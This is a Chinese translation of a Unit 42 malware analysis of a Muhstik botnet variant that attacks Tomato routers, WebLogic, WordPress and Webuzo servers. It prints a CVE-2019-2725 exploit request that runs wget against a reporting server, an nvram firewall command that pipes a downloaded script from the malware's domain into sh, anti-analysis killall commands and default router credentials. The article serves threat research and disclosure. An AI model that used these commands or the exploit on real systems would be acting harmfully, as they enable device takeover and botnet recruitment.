Muhstik僵尸网络分析 - 嘶吼 RoarTalk – 网络安全行业综合服务平台,4hou.com

Muhstik僵尸网络分析

ang010ela web安全 2020-02-19 11:15:00
1105231
收藏

导语:​本文对Muhstik僵尸网络进行详细分析。

2019年12月5日,Unit 42研究人员发现一个新的Muhstik僵尸网络变种,其中加入了扫描器来攻击Tomato路由器设备。

Tomato是一个开源的路由器固件,由于其灵活性、QoS等能力,Tomato固件被多个路由器厂商和终端用户使用。研究人员在Shodan搜索发现有超过4600台Tomato路由器暴露在互联网上。

Muhstik僵尸网络从2018年3月开始活跃,具有蠕虫般的自我传播能力,可以感染Linux服务器和IoT设备。Muhstik使用多个漏洞利用来感染Linux服务,如Weblogic, WordPress和Drupal。该僵尸网络还会感染IoT路由器,如GPON家用路由器和DD-WRT路由器。该变种会感染Tomato路由器来扩大僵尸网络的范围。

目前还没有发现Muhstik僵尸网络入侵有漏洞的路由器后的恶意活动,但就对Muhstik僵尸网络的了解来看,Muhstik主要发起加密货币挖矿活动和DDOS攻击来获利。

新的Tomato路由器扫描器

新的Muhstik变种在TCP 8080端口扫描了Tomato路由器,并可以使用默认凭证暴力破解来绕过admin web认证。在Tomato路由器中,默认凭证是“admin:admin” 和 “root:admin”。研究人员抓包得到的Tomato路由器web认证暴力破解流量如图1所示:

 图 1. Tomato路由器web认证暴力破解

研究人员在Shodan上搜索了Tomato路由器的指纹来估计受感染的主机量,如图2所示,在互联网上有大约4600台潜在的受害者主机,其中包含TomatoUSB设备的数量。

 图 2. 互联网上暴露的Tomato和TomatoUSB路由器

其他扫描器

Scan #1: WordPress

第一个模块是一个识别服务器上安装的WordPress的扫描器。为了执行扫描,会在tcp 80或8080端口发送一个GET请求,这两个端口都是常用的HTTP端口。

图 3. Daymon使用的WordPress扫描器

Scan #2: Webuzo

第二个模块是一个识别服务器上是否安装了Webuzo。为完成扫描,会向2004端口发送一个GET请求,这是Webuzo管理的默认窗口。请求会使用路径/install.php,这是Webuzo安装文件,运行Webuzo的服务器默认会成功响应该请求。

GET /install.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Host: 132.223.202.213

Scan #3: CVE-2019-2725 – WebLogic v10.3.6.0 -12.1.3.0

第3个模块滥用了Oracle WebLogic服务器中的一个反序列化漏洞,该漏洞会引发远程代码执行。攻击者可以在无需认证的情况下远程利用该漏洞。该漏洞利用会被发送到

WebLogic的默认端口 7001。

POST /_async/AsyncResponseService HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Host: 194.187.209.4
Content-Type: text/xml
content-length: 916
 xxxx    /bin/bash   -c   wget
http://165.227.78.159/wl.php

研究人员认为该URL hxxp://165.227.78[.]159/wl.php是用来报告的。因为IP 地址165.227.78[.]159之前就被报告过是Mushtik僵尸网络的报告服务器,用来收集僵尸主机的信息。

Muhstik僵尸网络基础设施

图 3是Muhstik表中的执行流。图4是融合了扫描运行了WordPress和Webuzo的Linux服务器的Muhstik僵尸网络变种。此外,它实现了入侵运行Tomato固件的WebLogic服务器和WiFi路由器。

图 4. Muhstik基础设施

图 5. 详细的扫描和漏洞利用行为

Muhstik变种payload

研究人员分析发现了一个名为tty0的恶意二进制文件。因为tty0的目标是Tomato路由器,其中包含可以在这些系统中执行的bash命令:

第一个命令是用来从http://y.fd6fq54s6df541q23sdxfg[.]eu/nvr下载名为nvr的二进制文件的。

/bin/sh -c nvram set rc_firewall="sleep 120 && wget -qO -
http://y.fd6fq54s6df541q23sdxfg.eu/nvr | sh" > /dev/null 2>&1
 
/bin/sh -c nvram commit > /dev/null 2>&1

恶意软件还用kill掉系统中的strace和tcpdump这样的反分析技术。

/usr/bin/killall -9 strace
/bin/sh -c killall -9 tcpdump > /dev/null 2>&1 &
/bin/sh -c killall -9 strace > /dev/null 2>&1 &
/usr/bin/killall -9 tcpdump

二进制文件nvr中还还有下载其他二进制文件的命令。这4个二进制文件都是IRC僵尸网络的变种,分别运行在ARM和MIPS架构上。研究人员对其中的二进制文件Pty5进行了分析,因为该文件释放了一个名为daymon的二进制文件,是一个含有攻击Tomato路由器的新模块的扫描器。

IRC C2

设备被黑后,就会发送一个connect命令到IRC服务器。Connect命令中含有设备的昵称(nickname)来加入到信道中。昵称中含有之前获取的受干扰设备的节点主机名,如图5所示。

 图 6. Hostname

图 6中,新增了连接命令的用户名。

USER muhstik localhost localhost :muhstik-11052018

服务器会响应一个含有BotnetID的PING命令。受感染的设备会回复一个含有BotnetID的PONG。一旦昵称构造好,并分配给受感染的客户端后,IRC服务器就会接受主机作为信道中的客户端。然后,服务器会发送一个MOTD (Message of the Day)给客户端。最后,受害者设备就会发送一个命令到加入名为ea的信道,其中命令会被发送给加入僵尸网络的客户端。僵尸主机会获取受干扰设备的信息来注册设备到僵尸网络中。

图 7. 加入IRC信道

总结

新的Muhstik僵尸网络变种证明了IoT僵尸网络的规模在不断扩大,并不断增加了新的扫描器和漏洞利用以收获新的IoT设备。僵尸网络的开发者也在不断地入侵安装了开源固件的物联网设备,因为这种开源的固件一般都缺乏及时的安全更新和维护补丁。

本文翻译自:https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/如若转载,请注明原文地址
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论

 
本站4hou.com,所使用的字体和图片文字等素材部分来源于原作者或互联网共享平台。如使用任何字体和图片文字有侵犯其版权所有方的,嘶吼将配合联系原作者核实,并做出删除处理。
©2022 北京嘶吼文化传媒有限公司 京ICP备16063439号-1 本站由 提供云计算服务